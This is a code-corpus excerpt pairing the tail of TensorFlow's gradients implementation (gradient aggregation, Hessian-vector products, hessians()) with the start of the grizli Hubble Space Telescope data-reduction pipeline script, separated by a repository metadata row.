ValueError: if the arguments are invalid.
"""
if aggregation_method is None:
aggregation_method = AggregationMethod.DEFAULT
if aggregation_method not in [
AggregationMethod.ADD_N, AggregationMethod.EXPERIMENTAL_TREE,
AggregationMethod.EXPERIMENTAL_ACCUMULATE_N
]:
raise ValueError(
"Invalid aggregation_method specified %s." % aggregation_method)
out_grads = _GetGrads(grads, op)
for i, out_grad in enumerate(out_grads):
if loop_state:
if isinstance(out_grad, (ops.Tensor, ops.IndexedSlices)):
assert control_flow_util.IsLoopSwitch(op)
continue
# Grads have to be Tensors or IndexedSlices
if (isinstance(out_grad, collections.Sequence) and not all([
isinstance(g, (ops.Tensor, ops.IndexedSlices))
for g in out_grad
if g is not None
])):
raise TypeError("gradients have to be either all Tensors "
"or all IndexedSlices")
# Aggregate multiple gradients, and convert [] to None.
if out_grad:
if len(out_grad) < 2:
used = "nop"
out_grads[i] = out_grad[0]
elif all([isinstance(g, ops.Tensor) for g in out_grad if g is not None]):
tensor_shape = _AccumulatorShape(out_grad)
if (aggregation_method == AggregationMethod.EXPERIMENTAL_ACCUMULATE_N
and len(out_grad) > 2 and tensor_shape.is_fully_defined()):
# The benefit of using AccumulateN is that its inputs can be combined
# in any order and this can allow the expression to be evaluated with
# a smaller memory footprint. When used with gpu_allocator_retry,
# it is possible to compute a sum of terms which are much larger than
# total GPU memory.
# AccumulateN can currently only be used if we know the shape for
# an accumulator variable. If this is not known, or if we only have
# 2 grads then we fall through to the "tree" case below.
used = "accumulate_n"
out_grads[i] = math_ops.accumulate_n(out_grad)
elif aggregation_method in [
AggregationMethod.EXPERIMENTAL_TREE,
AggregationMethod.EXPERIMENTAL_ACCUMULATE_N
]:
# Aggregate all gradients by doing pairwise sums: this may
# reduce performance, but it can improve memory because the
# gradients can be released earlier.
#
# TODO(vrv): Consider replacing this with a version of
# tf.AddN() that eagerly frees its inputs as soon as they are
# ready, so the order of this tree does not become a problem.
used = "tree"
with ops.name_scope(op.name + "_gradient_sum"):
running_sum = out_grad[0]
for grad in out_grad[1:]:
running_sum = math_ops.add_n([running_sum, grad])
out_grads[i] = running_sum
else:
used = "add_n"
out_grads[i] = _MultiDeviceAddN(out_grad, gradient_uid)
logging.vlog(2, " _AggregatedGrads %d x %s using %s", len(out_grad),
tensor_shape, used)
else:
out_grads[i] = _AggregateIndexedSlicesGradients(out_grad)
else: # not out_grad
# out_grads[i] is [], thus its aggregation is simply None.
out_grads[i] = None
return out_grads
def _AggregateIndexedSlicesGradients(grads):
"""Aggregates gradients of type `IndexedSlices` by concatenation."""
if len(grads) < 1:
return None
elif len(grads) == 1:
return grads[0]
else:
grads = math_ops._as_indexed_slices_list( # pylint: disable=protected-access
[g for g in grads if g is not None])
grads = [_HandleNestedIndexedSlices(x) for x in grads] # pylint: disable=protected-access
# Form IndexedSlices out of the concatenated values and indices.
concat_grad = ops.IndexedSlices(
array_ops.concat([x.values for x in grads], axis=0),
array_ops.concat([x.indices for x in grads], axis=0),
grads[0].dense_shape)
return concat_grad
# TODO(vrv): Make this available when we want to make it public.
def _hessian_vector_product(ys, xs, v):
"""Multiply the Hessian of `ys` wrt `xs` by `v`.
This is an efficient construction that uses a backprop-like approach
to compute the product between the Hessian and another vector. The
Hessian is usually too large to be explicitly computed or even
represented, but this method allows us to at least multiply by it
for the same big-O cost as backprop.
Implicit Hessian-vector products are the main practical, scalable way
of using second derivatives with neural networks. They allow us to
do things like construct Krylov subspaces and approximate conjugate
gradient descent.
Example: if `y` = 1/2 `x`^T A `x`, then `hessian_vector_product(y,
x, v)` will return an expression that evaluates to the same values
  as 1/2 (A + A.T) `v`.
Args:
ys: A scalar value, or a tensor or list of tensors to be summed to
yield a scalar.
xs: A list of tensors that we should construct the Hessian over.
v: A list of tensors, with the same shapes as xs, that we want to
multiply by the Hessian.
Returns:
A list of tensors (or if the list would be length 1, a single tensor)
containing the product between the Hessian and `v`.
Raises:
ValueError: `xs` and `v` have different length.
"""
# Validate the input
length = len(xs)
if len(v) != length:
raise ValueError("xs and v must have the same length.")
# First backprop
grads = gradients(ys, xs)
assert len(grads) == length
elemwise_products = [
math_ops.multiply(grad_elem, array_ops.stop_gradient(v_elem))
for grad_elem, v_elem in zip(grads, v)
if grad_elem is not None
]
# Second backprop
return gradients(elemwise_products, xs)
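# Illustrative sketch (hypothetical values): for y = 1/2 x^T A x with A
# symmetric, the Hessian is A, so the product below is A v.
#
#   A = tf.constant([[2.0, 0.0], [0.0, 4.0]])
#   x = tf.constant([[1.0], [1.0]])
#   v = [tf.constant([[1.0], [2.0]])]
#   y = 0.5 * tf.matmul(tf.transpose(x), tf.matmul(A, x))
#   hvp = _hessian_vector_product(y, [x], v)
#   # hvp[0] evaluates to [[2.0], [8.0]]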
@tf_export("hessians")
def hessians(ys,
xs,
name="hessians",
colocate_gradients_with_ops=False,
gate_gradients=False,
aggregation_method=None):
"""Constructs the Hessian of sum of `ys` with respect to `x` in `xs`.
`hessians()` adds ops to the graph to output the Hessian matrix of `ys`
with respect to `xs`. It returns a list of `Tensor` of length `len(xs)`
where each tensor is the Hessian of `sum(ys)`.
The Hessian is a matrix of second-order partial derivatives of a scalar
tensor (see https://en.wikipedia.org/wiki/Hessian_matrix for more details).
Args:
ys: A `Tensor` or list of tensors to be differentiated.
xs: A `Tensor` or list of tensors to be used for differentiation.
name: Optional name to use for grouping all the gradient ops together.
defaults to 'hessians'.
colocate_gradients_with_ops: See `gradients()` documentation for details.
gate_gradients: See `gradients()` documentation for details.
aggregation_method: See `gradients()` documentation for details.
Returns:
A list of Hessian matrices of `sum(ys)` for each `x` in `xs`.
Raises:
LookupError: if one of the operations between `xs` and `ys` does not
have a registered gradient function.
"""
xs = _AsList(xs)
kwargs = {
"colocate_gradients_with_ops": colocate_gradients_with_ops,
"gate_gradients": gate_gradients,
"aggregation_method": aggregation_method
}
# Compute first-order derivatives and iterate for each x in xs.
hessians = []
_gradients = gradients(ys, xs, **kwargs)
for gradient, x in zip(_gradients, xs):
# change shape to one-dimension without graph branching
gradient = array_ops.reshape(gradient, [-1])
# Declare an iterator and tensor array loop variables for the gradients.
n = array_ops.size(x)
loop_vars = [
array_ops.constant(0, dtypes.int32),
tensor_array_ops.TensorArray(x.dtype, n)
]
# Iterate over all elements of the gradient and compute second order
# derivatives.
_, hessian = control_flow_ops.while_loop(
lambda j, _: j < n,
lambda j, result: (j + 1,
result.write(j, gradients(gradient[j], x)[0])),
loop_vars
)
_shape = array_ops.shape(x)
_reshaped_hessian = array_ops.reshape(hessian.stack(),
array_ops.concat((_shape, _shape), 0))
hessians.append(_reshaped_hessian)
return hessians
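# Illustrative sketch (hypothetical values): Hessian of a simple quadratic.
#
#   x = tf.constant([1.0, 2.0])
#   y = tf.reduce_sum(x * x)
#   h, = tf.hessians(y, x)                       # evaluates to [[2., 0.], [0., 2.]]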
|
drpngx/tensorflow
|
tensorflow/python/ops/gradients_impl.py
|
Python
|
apache-2.0
| 47,933
|
[
"VisIt"
] |
87795aa178bea7f82bc21dc7cf45b0d7b5c3132337b8c866d179c0bf14cd3da4
|
"""
Automatic processing scripts for grizli
"""
import os
import inspect
import traceback
import glob
import time
import warnings
import numpy as np
import astropy.io.fits as pyfits
import astropy.wcs as pywcs
from .. import prep, utils
from .default_params import UV_N_FILTERS, UV_M_FILTERS, UV_W_FILTERS
from .default_params import OPT_N_FILTERS, OPT_M_FILTERS, OPT_W_FILTERS
from .default_params import IR_N_FILTERS, IR_M_FILTERS, IR_W_FILTERS
from .default_params import ALL_IMAGING_FILTERS, VALID_FILTERS
from .default_params import UV_GRISMS, OPT_GRISMS, IR_GRISMS, GRIS_REF_FILTERS
from .default_params import get_yml_parameters, write_params_to_yml
# needed for function definitions
args = get_yml_parameters()
if False:
np.seterr(divide='ignore', invalid='ignore', over='ignore', under='ignore')
# Only fetch F814W optical data for now
#ONLY_F814W = True
ONLY_F814W = False
def get_extra_data(root='j114936+222414', HOME_PATH='/Volumes/Pegasus/Grizli/Automatic', PERSIST_PATH=None, instruments=['WFC3'], filters=['F160W', 'F140W', 'F098M', 'F105W'], radius=2, run_fetch=True, from_mast=True, reprocess_parallel=True, s3_sync=False):
import os
import glob
import numpy as np
from hsaquery import query, fetch, fetch_mast
from hsaquery.fetch import DEFAULT_PRODUCTS
if PERSIST_PATH is None:
PERSIST_PATH = os.path.join(HOME_PATH, root, 'Persistence')
tab = utils.GTable.gread(os.path.join(HOME_PATH,
f'{root}_footprint.fits'))
# Fix CLEAR filter names
for i, filt_i in enumerate(tab['filter']):
if 'clear' in filt_i.lower():
spl = filt_i.lower().split(';')
if len(spl) > 1:
for s in spl:
if 'clear' not in s:
#print(filt_i, s)
filt_i = s.upper()
break
tab['filter'][i] = filt_i.upper()
ra, dec = tab.meta['RA'], tab.meta['DEC']
fp = np.load(os.path.join(HOME_PATH, '{0}_footprint.npy'.format(root)),
allow_pickle=True)[0]
radius = np.sqrt(fp.area*np.cos(dec/180*np.pi))*60/np.pi
xy = np.array(fp.boundary.convex_hull.boundary.xy)
dims = np.array([(xy[0].max()-xy[0].min())*np.cos(dec/180*np.pi),
xy[1].max()-xy[1].min()])*60
extra = query.run_query(box=[ra, dec, radius],
proposid=[],
instruments=instruments,
extensions=['FLT'],
filters=filters,
extra=query.DEFAULT_EXTRA)
# Fix CLEAR filter names
for i, filt_i in enumerate(extra['filter']):
if 'clear' in filt_i.lower():
spl = filt_i.lower().split(';')
if len(spl) > 1:
for s in spl:
if 'clear' not in s:
#print(filt_i, s)
filt_i = s.upper()
break
extra['filter'][i] = filt_i.upper()
for k in tab.meta:
extra.meta[k] = tab.meta[k]
extra.write(os.path.join(HOME_PATH, root, 'extra_data.fits'),
format='fits', overwrite=True)
CWD = os.getcwd()
os.chdir(os.path.join(HOME_PATH, root, 'RAW'))
if run_fetch:
if from_mast:
out = fetch_mast.get_from_MAST(extra,
inst_products=DEFAULT_PRODUCTS,
direct=True,
path=os.path.join(HOME_PATH, root, 'RAW'),
skip_existing=True)
else:
curl = fetch.make_curl_script(extra,
level=None,
script_name='extra.sh',
inst_products={'WFC3/UVIS': ['FLC'],
'WFPC2/PC': ['C0M', 'C1M'],
'WFC3/IR': ['RAW'],
'ACS/WFC': ['FLC']},
skip_existing=True,
output_path=os.path.join(HOME_PATH, root, 'RAW'),
s3_sync=s3_sync)
os.system('sh extra.sh')
files = glob.glob('*raw.fits.gz')
files.extend(glob.glob('*fl?.fits.gz'))
for file in files:
print('gunzip '+file)
os.system('gunzip {0}'.format(file))
else:
return extra
remove_bad_expflag(field_root=root, HOME_PATH=HOME_PATH, min_bad=2)
# Reprocess the RAWs into FLTs
status = os.system("python -c 'from grizli.pipeline import reprocess; reprocess.reprocess_wfc3ir(parallel={0})'".format(reprocess_parallel))
if status != 0:
from grizli.pipeline import reprocess
reprocess.reprocess_wfc3ir(parallel=False)
# Persistence products
os.chdir(PERSIST_PATH)
persist_files = fetch.persistence_products(extra)
for file in persist_files:
if not os.path.exists(os.path.basename(file)):
print(file)
os.system('curl -O {0}'.format(file))
for file in persist_files:
root = os.path.basename(file).split('.tar.gz')[0]
if os.path.exists(root):
print('Skip', root)
continue
if not os.path.exists(file):
print('Persistence tar file {0} not found'.format(file))
continue
# Ugly callout to shell
os.system('tar xzvf {0}.tar.gz'.format(root))
# Clean unneeded files
clean_files = glob.glob('{0}/*extper.fits'.format(root))
clean_files += glob.glob('{0}/*flt_cor.fits'.format(root))
for f in clean_files:
os.remove(f)
# Symlink to ./
pfiles = glob.glob('{0}/*persist.fits'.format(root))
if len(pfiles) > 0:
for f in pfiles:
if not os.path.exists(os.path.basename(f)):
os.system('ln -sf {0} ./'.format(f))
os.chdir(CWD)
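# Usage sketch (field name and path are hypothetical): with run_fetch=False the
# function just returns the query table of additional exposures.
#
#   extra = get_extra_data(root='j114936+222414', HOME_PATH='/data/grizli',
#                          run_fetch=False)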
def create_path_dict(root='j142724+334246', home='$PWD', raw=None, prep=None, extract=None, persist=None, thumbs=None, paths={}):
"""
Generate path dict.
Default:
{home}
{home}/{root}
{home}/{root}/RAW
{home}/{root}/Prep
{home}/{root}/Persistence
{home}/{root}/Extractions
{home}/{root}/Thumbnails
    If ``home`` is specified as '$PWD', it will be calculated from
`os.getcwd`.
Only generates values for keys not already specified in `paths`.
"""
import copy
if home == '$PWD':
home = os.getcwd()
base = os.path.join(home, root)
if raw is None:
raw = os.path.join(home, root, 'RAW')
if prep is None:
prep = os.path.join(home, root, 'Prep')
if persist is None:
persist = os.path.join(home, root, 'Persistence')
if extract is None:
extract = os.path.join(home, root, 'Extractions')
if thumbs is None:
        thumbs = os.path.join(home, root, 'Thumbnails')
xpaths = copy.deepcopy(paths)
for k in xpaths:
if xpaths[k] is None:
_ = xpaths.pop(k)
if 'home' not in xpaths:
xpaths['home'] = home
if 'base' not in xpaths:
xpaths['base'] = base
if 'raw' not in xpaths:
xpaths['raw'] = raw
if 'prep' not in xpaths:
xpaths['prep'] = prep
if 'persist' not in xpaths:
xpaths['persist'] = persist
if 'extract' not in xpaths:
xpaths['extract'] = extract
if 'thumbs' not in xpaths:
        xpaths['thumbs'] = thumbs
return xpaths
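# Usage sketch (hypothetical rootname and home directory):
#
#   paths = create_path_dict(root='j010311+131615', home='/data/grizli')
#   # paths['raw']  -> '/data/grizli/j010311+131615/RAW'
#   # paths['prep'] -> '/data/grizli/j010311+131615/Prep'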
def go(root='j010311+131615',
HOME_PATH='$PWD',
RAW_PATH=None, PREP_PATH=None, PERSIST_PATH=None, EXTRACT_PATH=None,
filters=args['filters'],
fetch_files_args=args['fetch_files_args'],
inspect_ramps=False,
is_dash=False, run_prepare_dash=True,
run_parse_visits=True,
is_parallel_field=False,
parse_visits_args=args['parse_visits_args'],
manual_alignment=False,
manual_alignment_args=args['manual_alignment_args'],
preprocess_args=args['preprocess_args'],
visit_prep_args=args['visit_prep_args'],
persistence_args=args['persistence_args'],
redo_persistence_mask=False,
run_fine_alignment=True,
fine_backup=True,
fine_alignment_args=args['fine_alignment_args'],
make_mosaics=True,
mosaic_args=args['mosaic_args'],
mosaic_drizzle_args=args['mosaic_drizzle_args'],
mask_spikes=False,
mosaic_driz_cr_type=0,
make_phot=True,
multiband_catalog_args=args['multiband_catalog_args'],
only_preprocess=False,
overwrite_fit_params=False,
grism_prep_args=args['grism_prep_args'],
refine_with_fits=True,
run_extractions=False,
include_photometry_in_fit=False,
extract_args=args['extract_args'],
make_thumbnails=True,
thumbnail_args=args['thumbnail_args'],
make_final_report=True,
get_dict=False,
kill='',
**kwargs
):
"""
Run the full pipeline for a given target
Parameters
----------
root : str
Rootname of the `mastquery` file.
extract_maglim : [min, max]
Magnitude limits of objects to extract and fit.
"""
# Function defaults
if get_dict:
if get_dict <= 2:
# Default function arguments (different value to avoid recursion)
default_args = go(get_dict=10)
frame = inspect.currentframe()
args = inspect.getargvalues(frame).locals
for k in ['root', 'HOME_PATH', 'frame', 'get_dict']:
if k in args:
args.pop(k)
if get_dict == 2:
# Print keywords summary
if len(kwargs) > 0:
print('\n*** Extra args ***\n')
for k in kwargs:
if k not in default_args:
print('\'{0}\':{1},'.format(k, kwargs[k]))
print('\n*** User args ***\n')
for k in args:
if k in default_args:
if args[k] != default_args[k]:
print('\'{0}\':{1},'.format(k, args[k]))
print('\n*** Default args ***\n')
for k in args:
if k in default_args:
print('\'{0}\':{1},'.format(k, args[k]))
return args
else:
return args
# import os
# import glob
# import traceback
#
#
try:
from .. import multifit
from . import auto_script
except:
from grizli import multifit
from grizli.pipeline import auto_script
# #import grizli.utils
import matplotlib.pyplot as plt
# Silence numpy and astropy warnings
utils.set_warnings()
PATHS = create_path_dict(root=root, home=HOME_PATH,
raw=RAW_PATH, prep=PREP_PATH,
persist=PERSIST_PATH, extract=EXTRACT_PATH)
fpfile = os.path.join(PATHS['home'], '{0}_footprint.fits'.format(root))
exptab = utils.GTable.gread(fpfile)
# Fix CLEAR filter names
for i, filt_i in enumerate(exptab['filter']):
if 'clear' in filt_i.lower():
spl = filt_i.lower().split(';')
if len(spl) > 1:
for s in spl:
if 'clear' not in s:
#print(filt_i, s)
filt_i = s.upper()
break
exptab['filter'][i] = filt_i.upper()
utils.LOGFILE = os.path.join(PATHS['home'], f'{root}.auto_script.log.txt')
utils.log_comment(utils.LOGFILE, '### Pipeline start', show_date=True)
######################
# Download data
os.chdir(PATHS['home'])
if fetch_files_args is not None:
fetch_files_args['reprocess_clean_darks'] &= (not is_dash)
auto_script.fetch_files(field_root=root, HOME_PATH=HOME_PATH,
paths=PATHS,
filters=filters, **fetch_files_args)
else:
os.chdir(PATHS['prep'])
if is_dash & run_prepare_dash:
from wfc3dash import process_raw
os.chdir(PATHS['raw'])
process_raw.run_all()
files = glob.glob(os.path.join(PATHS['raw'], '*_fl*fits'))
files += glob.glob(os.path.join(PATHS['raw'], '*_c[01]m.fits'))
if len(files) == 0:
print('No FL[TC] files found!')
utils.LOGFILE = '/tmp/grizli.log'
return False
if kill == 'fetch_files':
print('kill=\'fetch_files\'')
return True
if inspect_ramps:
# Inspect for CR trails
os.chdir(PATHS['raw'])
status = os.system("python -c 'from grizli.pipeline.reprocess import inspect; inspect()'")
######################
# Parse visit associations
os.chdir(PATHS['prep'])
if (not os.path.exists(f'{root}_visits.npy')) | run_parse_visits:
# Parsing for parallel fields, where time-adjacent exposures
# may have different visit IDs and should be combined
if 'combine_same_pa' in parse_visits_args:
if (parse_visits_args['combine_same_pa'] == -1):
if is_parallel_field:
parse_visits_args['combine_same_pa'] = True
parse_visits_args['max_dt'] = 4./24
else:
parse_visits_args['combine_same_pa'] = False
parse_visits_args['max_dt'] = 1.
else:
parse_visits_args['combine_same_pa'] = is_parallel_field
parsed = auto_script.parse_visits(field_root=root,
RAW_PATH=PATHS['raw'],
filters=filters, is_dash=is_dash,
**parse_visits_args)
else:
parsed = np.load(f'{root}_visits.npy', allow_pickle=True)
if kill == 'parse_visits':
print('kill=\'parse_visits\'')
return True
visits, all_groups, info = parsed
run_has_grism = utils.column_string_operation(info['FILTER'],
['G141', 'G102', 'G800L'],
'count', 'or').sum()
# Alignment catalogs
#catalogs = ['PS1','SDSS','GAIA','WISE']
#######################
# Manual alignment
if manual_alignment:
os.chdir(PATHS['prep'])
auto_script.manual_alignment(field_root=root, HOME_PATH=PATHS['home'],
**manual_alignment_args)
if kill == 'manual_alignment':
print('kill=\'manual_alignment\'')
return True
#####################
# Alignment & mosaics
os.chdir(PATHS['prep'])
tweak_max_dist = (5 if is_parallel_field else 1)
if 'tweak_max_dist' not in visit_prep_args:
visit_prep_args['tweak_max_dist'] = tweak_max_dist
if 'use_self_catalog' not in visit_prep_args:
visit_prep_args['use_self_catalog'] = is_parallel_field
auto_script.preprocess(field_root=root, HOME_PATH=PATHS['home'],
PERSIST_PATH=PATHS['persist'],
visit_prep_args=visit_prep_args,
persistence_args=persistence_args,
**preprocess_args)
if kill == 'preprocess':
print('kill=\'preprocess\'')
print(f'Update exposure footprints in {root}_visits.npy')
get_visit_exposure_footprints(visit_file=f'{root}_visits.npy',
check_paths=['./', PATHS['raw'],
'../RAW'])
return True
if redo_persistence_mask:
comment = '# Redo persistence masking: {0}'.format(persistence_args)
print(comment)
utils.log_comment(utils.LOGFILE, comment)
all_flt_files = glob.glob('*_flt.fits')
all_flt_files.sort()
for file in all_flt_files:
print(file)
pfile = os.path.join(PATHS['persist'],
file.replace('_flt', '_persist'))
if os.path.exists(pfile):
prep.apply_persistence_mask(file, path=PATHS['persist'],
**persistence_args)
##########
# Fine alignment
fine_files = glob.glob('{0}*fine.png'.format(root))
if (run_fine_alignment == 2) & (len(fine_files) > 0) & (len(visits) > 1):
msg = '\n\n### Redo visit-level mosaics and catalogs for fine alignment\n\n'
utils.log_comment(utils.LOGFILE, msg, show_date=True, verbose=True)
keep_visits = []
for visit in visits:
visit_files = glob.glob(visit['product']+'*.cat.*')
visit_files += glob.glob(visit['product']+'_dr*')
visit_files += glob.glob(visit['product']+'*seg.fits*')
if len(visit_files) > 0:
keep_visits.append(visit)
for file in visit_files:
os.remove(file)
# Redrizzle visit-level mosaics and remake catalogs
prep.drizzle_overlaps(keep_visits, check_overlaps=False, skysub=False,
static=False, pixfrac=0.5, scale=None,
final_wcs=False, fetch_flats=False,
final_rot=None,
include_saturated=True)
# Make new catalogs
for visit in keep_visits:
if len(visit['files']) == 0:
continue
visit_filter = visit['product'].split('-')[-1]
is_single = len(visit['files']) == 1
isACS = '_flc' in visit['files'][0]
isWFPC2 = '_c0' in visit['files'][0]
if visit_filter in ['g102', 'g141', 'g800l', 'g280']:
print('# Skip grism visit: {0}'.format(visit['product']))
continue
# New catalog
if visit_prep_args['align_thresh'] is None:
thresh = 2.5
else:
thresh = visit_prep_args['align_thresh']
cat = prep.make_SEP_catalog(root=visit['product'],
threshold=thresh)
# New region file
prep.table_to_regions(cat, '{0}.cat.reg'.format(visit['product']))
# New radec
if not ((isACS | isWFPC2) & is_single):
# 140 brightest or mag range
clip = (cat['MAG_AUTO'] > 18) & (cat['MAG_AUTO'] < 23)
clip &= cat['MAGERR_AUTO'] < 0.05
clip &= utils.catalog_mask(cat,
max_err_percentile=visit_prep_args['max_err_percentile'],
pad=visit_prep_args['catalog_mask_pad'],
pad_is_absolute=False, min_flux_radius=1.)
NMAX = 140
so = np.argsort(cat['MAG_AUTO'][clip])
if clip.sum() > NMAX:
so = so[:NMAX]
prep.table_to_radec(cat[clip][so],
'{0}.cat.radec'.format(visit['product']))
for file in fine_files:
print('rm {0}'.format(file))
os.remove(file)
fine_files = []
if (len(fine_files) == 0) & (run_fine_alignment > 0) & (len(visits) > 1):
fine_catalogs = ['GAIA', 'PS1', 'DES', 'SDSS', 'WISE']
try:
out = auto_script.fine_alignment(field_root=root,
HOME_PATH=PATHS['home'],
**fine_alignment_args)
plt.close()
# Update WCS headers with fine alignment
auto_script.update_wcs_headers_with_fine(root, backup=fine_backup)
except:
utils.log_exception(utils.LOGFILE, traceback)
utils.log_comment(utils.LOGFILE, "# !! Fine alignment failed")
# Update the visits file with the new exposure footprints
print('Update exposure footprints in {0}_visits.npy'.format(root))
get_visit_exposure_footprints(visit_file='{0}_visits.npy'.format(root),
check_paths=['./', PATHS['raw'], '../RAW'])
# Make combined mosaics
no_mosaics_found = len(glob.glob(f'{root}-ir_dr?_sci.fits')) == 0
if no_mosaics_found & make_mosaics:
skip_single = preprocess_args['skip_single_optical_visits']
if 'fix_stars' in visit_prep_args:
fix_stars = visit_prep_args['fix_stars']
else:
fix_stars = False
# For running at the command line
# if False:
# mos_args = {'mosaic_args': kwargs['mosaic_args'],
# 'fix_stars': kwargs['visit_prep_args']['fix_stars'],
# 'mask_spikes': kwargs['mask_spikes'], 'skip_single_optical_visits': kwargs['preprocess_args']['skip_single_optical_visits']}
# auto_script.make_combined_mosaics(root, **mos_args)
make_combined_mosaics(root, mosaic_args=mosaic_args,
fix_stars=fix_stars, mask_spikes=mask_spikes,
skip_single_optical_visits=skip_single,
mosaic_driz_cr_type=mosaic_driz_cr_type,
mosaic_drizzle_args=mosaic_drizzle_args)
# Make PSFs. Always set get_line_maps=False since PSFs now
# provided for each object.
mosaic_files = glob.glob('{0}-f*sci.fits'.format(root))
if (not is_dash) & (len(mosaic_files) > 0):
print('Make field PSFs')
auto_script.field_psf(root=root, PREP_PATH=PATHS['prep'],
RAW_PATH=PATHS['raw'],
EXTRACT_PATH=PATHS['extract'],
get_line_maps=False, skip=False)
# Are there full-field mosaics?
mosaic_files = glob.glob(f'{root}-f*sci.fits')
# Photometric catalog
has_phot_file = os.path.exists(f'{root}_phot.fits')
if (not has_phot_file) & make_phot & (len(mosaic_files) > 0):
try:
tab = auto_script.multiband_catalog(field_root=root,
**multiband_catalog_args)
try:
# Add columns indicating objects that fall in grism exposures
phot = utils.read_catalog(f'{root}_phot.fits')
out = count_grism_exposures(phot, all_groups,
grisms=['g800l', 'g102', 'g141'],
verbose=True)
phot.write(f'{root}_phot.fits', overwrite=True)
except:
pass
except:
utils.log_exception(utils.LOGFILE, traceback)
utils.log_comment(utils.LOGFILE,
'# Run `multiband_catalog` with `detection_background=True`')
multiband_catalog_args['detection_background'] = True
tab = auto_script.multiband_catalog(field_root=root,
**multiband_catalog_args)
#tab = auto_script.multiband_catalog(field_root=root, threshold=threshold, detection_background=True, photometry_background=True, get_all_filters=False)
# Make exposure json / html report
auto_script.exposure_report(root, log=True)
# Stop if only want to run pre-processing
if (only_preprocess | (len(all_groups) == 0)):
if make_thumbnails:
print('#####\n# Make RGB thumbnails\n#####')
if thumbnail_args['drizzler_args'] is None:
thumbnail_args['drizzler_args'] = DRIZZLER_ARGS.copy()
os.chdir(PATHS['prep'])
#print('XXX ', thumbnail_args)
auto_script.make_rgb_thumbnails(root=root, **thumbnail_args)
if not os.path.exists(PATHS['thumbs']):
os.mkdir(PATHS['thumbs'])
os.system('mv {0}_[0-9]*.png {0}_[0-9]*.fits {1}'.format(root,
PATHS['thumbs']))
if make_final_report:
make_report(root, make_rgb=True)
utils.LOGFILE = '/tmp/grizli.log'
return True
######################
# Grism prep
files = glob.glob(os.path.join(PATHS['prep'], '*GrismFLT.fits'))
files += glob.glob(os.path.join(PATHS['extract'], '*GrismFLT.fits'))
if len(files) == 0:
os.chdir(PATHS['prep'])
grp = auto_script.grism_prep(field_root=root, PREP_PATH=PATHS['prep'],
EXTRACT_PATH=PATHS['extract'],
**grism_prep_args)
del(grp)
######################
# Grism extractions
os.chdir(PATHS['extract'])
#####################
# Update the contam model with the "full.fits"
# files in the working directory
if (len(glob.glob('*full.fits')) > 0) & (refine_with_fits):
auto_script.refine_model_with_fits(field_root=root, clean=True,
grp=None, master_files=None,
spectrum='continuum', max_chinu=5)
# Drizzled grp objects
# All files
if len(glob.glob(f'{root}*_grism*fits*')) == 0:
grism_files = glob.glob('*GrismFLT.fits')
grism_files.sort()
catalog = glob.glob(f'{root}-*.cat.fits')[0]
try:
seg_file = glob.glob(f'{root}-*_seg.fits')[0]
except:
seg_file = None
grp = multifit.GroupFLT(grism_files=grism_files, direct_files=[],
ref_file=None, seg_file=seg_file,
catalog=catalog, cpu_count=-1, sci_extn=1,
pad=256)
# Make drizzle model images
grp.drizzle_grism_models(root=root, kernel='point', scale=0.15)
# Free grp object
del(grp)
if is_parallel_field:
pline = auto_script.PARALLEL_PLINE.copy()
else:
pline = auto_script.DITHERED_PLINE.copy()
# Make script for parallel processing
args_file = f'{root}_fit_args.npy'
if (not os.path.exists(args_file)) | (overwrite_fit_params):
msg = '# generate_fit_params: ' + args_file
utils.log_comment(utils.LOGFILE, msg, verbose=True, show_date=True)
pline['pixscale'] = mosaic_args['wcs_params']['pixel_scale']
pline['pixfrac'] = mosaic_args['mosaic_pixfrac']
if pline['pixfrac'] > 0:
pline['kernel'] = 'square'
else:
pline['kernel'] = 'point'
has_g800l = utils.column_string_operation(info['FILTER'], ['G800L'],
'count', 'or').sum()
if has_g800l > 0:
min_sens = 0.
fit_trace_shift = True
else:
min_sens = 0.001
fit_trace_shift = True
try:
auto_script.generate_fit_params(field_root=root, prior=None, MW_EBV=exptab.meta['MW_EBV'], pline=pline, fit_only_beams=True, run_fit=True, poly_order=7, fsps=True, min_sens=min_sens, sys_err=0.03, fcontam=0.2, zr=[0.05, 3.4], save_file=args_file, fit_trace_shift=fit_trace_shift, include_photometry=True, use_phot_obj=include_photometry_in_fit)
except:
# include_photometry failed?
auto_script.generate_fit_params(field_root=root, prior=None, MW_EBV=exptab.meta['MW_EBV'], pline=pline, fit_only_beams=True, run_fit=True, poly_order=7, fsps=True, min_sens=min_sens, sys_err=0.03, fcontam=0.2, zr=[0.05, 3.4], save_file=args_file, fit_trace_shift=fit_trace_shift, include_photometry=False, use_phot_obj=False)
# Copy for now
os.system(f'cp {args_file} fit_args.npy')
# Done?
if (not run_extractions) | (run_has_grism == 0):
# Make RGB thumbnails
if make_thumbnails:
print('#####\n# Make RGB thumbnails\n#####')
if thumbnail_args['drizzler_args'] is None:
thumbnail_args['drizzler_args'] = DRIZZLER_ARGS.copy()
os.chdir(PATHS['prep'])
auto_script.make_rgb_thumbnails(root=root, **thumbnail_args)
if not os.path.exists(PATHS['thumbs']):
os.mkdir(PATHS['thumbs'])
os.system('mv {0}_[0-9]*.png {0}_[0-9]*.fits {1}'.format(root,
PATHS['thumbs']))
utils.LOGFILE = '/tmp/grizli.log'
return True
# Run extractions (and fits)
auto_script.extract(field_root=root, **extract_args)
# Make RGB thumbnails
if make_thumbnails:
print('#####\n# Make RGB thumbnails\n#####')
if thumbnail_args['drizzler_args'] is None:
thumbnail_args['drizzler_args'] = DRIZZLER_ARGS.copy()
os.chdir(PATHS['prep'])
auto_script.make_rgb_thumbnails(root=root, **thumbnail_args)
if not os.path.exists(PATHS['thumbs']):
os.mkdir(PATHS['thumbs'])
os.system('mv {0}_[0-9]*.png {0}_[0-9]*.fits {1}'.format(root,
PATHS['thumbs']))
if extract_args['run_fit']:
os.chdir(PATHS['extract'])
# Redrizzle grism models
grism_files = glob.glob('*GrismFLT.fits')
grism_files.sort()
seg_file = glob.glob(f'{root}-[fi]*_seg.fits')[0]
#catalog = glob.glob(f'{root}-*.cat.fits')[0]
catalog = seg_file.replace('_seg.fits','.cat.fits')
grp = multifit.GroupFLT(grism_files=grism_files, direct_files=[],
ref_file=None, seg_file=seg_file,
catalog=catalog, cpu_count=-1, sci_extn=1,
pad=256)
# Make drizzle model images
grp.drizzle_grism_models(root=root, kernel='point', scale=0.15)
# Free grp object
del(grp)
######################
# Summary catalog & webpage
auto_script.summary_catalog(field_root=root, dzbin=0.01,
use_localhost=False,
filter_bandpasses=None)
if make_final_report:
make_report(root, make_rgb=True)
def make_directories(root='j142724+334246', HOME_PATH='$PWD', paths={}):
"""
